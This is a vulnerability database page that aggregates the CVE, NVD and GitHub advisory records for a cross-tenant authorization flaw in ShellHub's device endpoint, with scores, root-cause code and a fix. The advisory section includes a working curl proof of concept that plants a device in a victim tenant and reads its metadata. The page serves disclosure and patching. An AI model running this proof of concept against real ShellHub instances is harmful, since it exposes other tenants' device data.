Vulnerability-Lookup

CVE-2026-44424 (GCVE-0-2026-44424)

Vulnerability from cvelistv5 – Published: 2026-05-13 21:06 – Updated: 2026-05-14 12:58

Title

ShellHub: Cross-tenant IDOR in `GET /api/devices/:uid` discloses device data of any namespace

Summary

ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2.

Severity

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/shellhub-io/shellhub/security/…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
shellhub-io	shellhub	Affected: < 0.24.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44424",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-14T12:58:24.657144Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-14T12:58:51.178Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "shellhub",
          "vendor": "shellhub-io",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.24.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller\u0027s namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639: Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-13T21:06:49.859Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f"
        }
      ],
      "source": {
        "advisory": "GHSA-j72x-xfwg-783f",
        "discovery": "UNKNOWN"
      },
      "title": "ShellHub: Cross-tenant IDOR in `GET /api/devices/:uid` discloses device data of any namespace"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44424",
    "datePublished": "2026-05-13T21:06:49.859Z",
    "dateReserved": "2026-05-06T14:40:00.953Z",
    "dateUpdated": "2026-05-14T12:58:51.178Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44424",
      "date": "2026-05-25",
      "epss": "0.00035",
      "percentile": "0.10585"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44424\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-13T22:16:44.257\",\"lastModified\":\"2026-05-18T13:35:06.663\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller\u0027s namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-639\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:shellhub:shellhub:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.24.2\",\"matchCriteriaId\":\"1AF40CEA-4F29-4C8E-9F9E-98310368352E\"}]}]}],\"references\":[{\"url\":\"https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]},{\"url\":\"https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44424\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-14T12:58:24.657144Z\"}}}], \"references\": [{\"url\": \"https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-14T12:58:47.751Z\"}}], \"cna\": {\"title\": \"ShellHub: Cross-tenant IDOR in `GET /api/devices/:uid` discloses device data of any namespace\", \"source\": {\"advisory\": \"GHSA-j72x-xfwg-783f\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"shellhub-io\", \"product\": \"shellhub\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.24.2\"}]}], \"references\": [{\"url\": \"https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f\", \"name\": \"https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller\u0027s namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639: Authorization Bypass Through User-Controlled Key\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-13T21:06:49.859Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-44424\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-14T12:58:51.178Z\", \"dateReserved\": \"2026-05-06T14:40:00.953Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-13T21:06:49.859Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-44424

Vulnerability from fkie_nvd - Published: 2026-05-13 22:16 - Updated: 2026-05-18 13:35

Severity

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f	Exploit, Vendor Advisory, Mitigation
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f	Exploit, Vendor Advisory, Mitigation

Impacted products

	Vendor	Product	Version
	shellhub	shellhub	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:shellhub:shellhub:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1AF40CEA-4F29-4C8E-9F9E-98310368352E",
              "versionEndExcluding": "0.24.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ShellHub is a centralized SSH gateway. Prior to 0.24.2, GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller\u0027s namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace. This vulnerability is fixed in 0.24.2."
    }
  ],
  "id": "CVE-2026-44424",
  "lastModified": "2026-05-18T13:35:06.663",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-13T22:16:44.257",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory",
        "Mitigation"
      ],
      "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory",
        "Mitigation"
      ],
      "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-639"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-J72X-XFWG-783F

Vulnerability from github – Published: 2026-05-06 23:19 – Updated: 2026-05-14 20:43

Summary

ShellHub has cross-tenant IDOR in `GET /api/devices/:uid` that discloses device data of any namespace

Details

Summary

GET /api/devices/:uid returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller's namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace.

Severity

CVSS 3.1: 7.5 (High) CWE-639 — Authorization Bypass Through User-Controlled Key

Affected versions

ShellHub Community v0.24.1 (validated). Likely all prior versions that share this handler.

Root cause

api/services/device.go:97-104 — GetDevice resolves the device by UID without scoping to the caller's tenant:

go func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) { device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid)) // ⚠️ missing: s.store.Options().InNamespace(tenant) ... }

Compare with DeleteDevice in the same file (line 137) which correctly applies InNamespace(tenant).

The Authorize middleware (api/routes/middleware/authorize.go:12-27) only checks that a tenant is present in the context — not that the resource belongs to that tenant.

Proof of concept (validated live against v0.24.1)

Pre-requisite: attacker has any valid user account and knows a target tenant_id (UUIDs frequently leak via UI URLs, email invites, support channels, or prior namespace membership).

```bash ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"..."}' | jq -r .token)

TARGET_TENANT=""

# Plant a device in the victim tenant via the public device-auth endpoint # (this also works when the victim already has devices and the attacker # merely guessed/obtained a real UID via another vector) VICTIM_UID=$(curl -s -X POST http://target/api/devices/auth \ -H 'Content-Type: application/json' \ -d "{ \"info\":{\"id\":\"x\",\"pretty_name\":\"x\",\"version\":\"v0.24.1\",\"arch\":\"amd64\",\"platform\":\"docker\"}, \"hostname\":\"poc\", \"identity\":{\"mac\":\"aa:bb:cc:dd:ee:ff\"}, \"public_key\":\"-----BEGIN RSA PUBLIC KEY-----\nx\n-----END RSA PUBLIC KEY-----\", \"tenant_id\":\"$TARGET_TENANT\" }" | jq -r .uid)

# Read the device from a completely different tenant curl -i "http://target/api/devices/$VICTIM_UID" \ -H "Authorization: Bearer $ATTACKER_TOKEN" # Expected (fixed): HTTP 403/404 # Observed (v0.24.1): HTTP 200 + full device JSON (tenant_id, public_key, MAC, # namespace name, OS info, last_seen, remote_addr, ...) ```

Impact

Cross-tenant disclosure of device metadata: hostname, MAC, OS fingerprint, public SSH key, namespace name, last-seen timestamp, remote address.
Enables namespace enumeration, device inventory reconnaissance of other tenants, and targeted follow-up attacks.

Suggested fix

In api/services/device.go GetDevice, extract tenant from context and apply InNamespace:

go func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) { tenant := gateway.TenantFromContext(ctx) opts := []store.QueryOption{} if tenant != nil { opts = append(opts, s.store.Options().InNamespace(tenant.ID)) } device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid), opts...) ... }

Severity

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.24.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/shellhub-io/shellhub"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.24.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44424"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T23:19:46Z",
    "nvd_published_at": "2026-05-13T22:16:44Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n`GET /api/devices/:uid` returns the full device object whenever the caller is authenticated, without verifying that the device belongs to the caller\u0027s namespace (tenant). Any authenticated user (JWT or API Key) who knows or can guess a device UID can read device metadata from any other namespace.\n\n## Severity\n**CVSS 3.1: 7.5 (High)** \nCWE-639 \u2014 Authorization Bypass Through User-Controlled Key\n\n## Affected versions\nShellHub Community v0.24.1 (validated). Likely all prior versions that share this handler.\n\n## Root cause\n`api/services/device.go:97-104` \u2014 `GetDevice` resolves the device by UID without scoping to the caller\u0027s tenant:\n\n  ```go\n  func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) {\n      device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid))\n      // \u26a0\ufe0f missing: s.store.Options().InNamespace(tenant)\n      ...\n  }\n  ```\n\nCompare with `DeleteDevice` in the same file (line 137) which correctly applies `InNamespace(tenant)`.\n\nThe `Authorize` middleware (`api/routes/middleware/authorize.go:12-27`) only checks that a tenant is present in the context \u2014 not that the resource belongs to that tenant.\n\n## Proof of concept (validated live against v0.24.1)\n\nPre-requisite: attacker has any valid user account and knows a target `tenant_id` (UUIDs frequently leak via UI URLs, email invites, support channels, or prior namespace membership).\n\n  ```bash\n  ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    -d \u0027{\"username\":\"attacker\",\"password\":\"...\"}\u0027 | jq -r .token)\n\n  TARGET_TENANT=\"\u003cvictim-tenant-uuid\u003e\"\n\n  # Plant a device in the victim tenant via the public device-auth endpoint\n  # (this also works when the victim already has devices and the attacker\n  # merely guessed/obtained a real UID via another vector)\n  VICTIM_UID=$(curl -s -X POST http://target/api/devices/auth \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    -d \"{\n      \\\"info\\\":{\\\"id\\\":\\\"x\\\",\\\"pretty_name\\\":\\\"x\\\",\\\"version\\\":\\\"v0.24.1\\\",\\\"arch\\\":\\\"amd64\\\",\\\"platform\\\":\\\"docker\\\"},\n      \\\"hostname\\\":\\\"poc\\\",\n      \\\"identity\\\":{\\\"mac\\\":\\\"aa:bb:cc:dd:ee:ff\\\"},\n      \\\"public_key\\\":\\\"-----BEGIN RSA PUBLIC KEY-----\\\\nx\\\\n-----END RSA PUBLIC KEY-----\\\",\n      \\\"tenant_id\\\":\\\"$TARGET_TENANT\\\"\n    }\" | jq -r .uid)\n\n  # Read the device from a completely different tenant\n  curl -i \"http://target/api/devices/$VICTIM_UID\" \\\n    -H \"Authorization: Bearer $ATTACKER_TOKEN\"\n  # Expected (fixed):   HTTP 403/404\n  # Observed (v0.24.1): HTTP 200 + full device JSON (tenant_id, public_key, MAC,\n  #                     namespace name, OS info, last_seen, remote_addr, ...)\n  ```\n\n## Impact\n  - Cross-tenant disclosure of device metadata: hostname, MAC, OS fingerprint, public SSH key, namespace name, last-seen timestamp, remote address.\n  - Enables namespace enumeration, device inventory reconnaissance of other tenants, and targeted follow-up attacks.\n\n## Suggested fix\nIn `api/services/device.go` `GetDevice`, extract tenant from context and apply `InNamespace`:\n\n  ```go\n  func (s *service) GetDevice(ctx context.Context, uid models.UID) (*models.Device, error) {\n      tenant := gateway.TenantFromContext(ctx)\n      opts := []store.QueryOption{}\n      if tenant != nil {\n          opts = append(opts, s.store.Options().InNamespace(tenant.ID))\n      }\n      device, err := s.store.DeviceResolve(ctx, store.DeviceUIDResolver, string(uid), opts...)\n      ...\n  }\n  ```",
  "id": "GHSA-j72x-xfwg-783f",
  "modified": "2026-05-14T20:43:14Z",
  "published": "2026-05-06T23:19:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/shellhub-io/shellhub/security/advisories/GHSA-j72x-xfwg-783f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44424"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/shellhub-io/shellhub"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ShellHub has cross-tenant IDOR in `GET /api/devices/:uid` that discloses device data of any namespace"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44424 (GCVE-0-2026-44424)

FKIE_CVE-2026-44424

GHSA-J72X-XFWG-783F

Summary

Severity

Affected versions

Root cause

Proof of concept (validated live against v0.24.1)

Impact

Suggested fix

Tags

Sightings

Nomenclature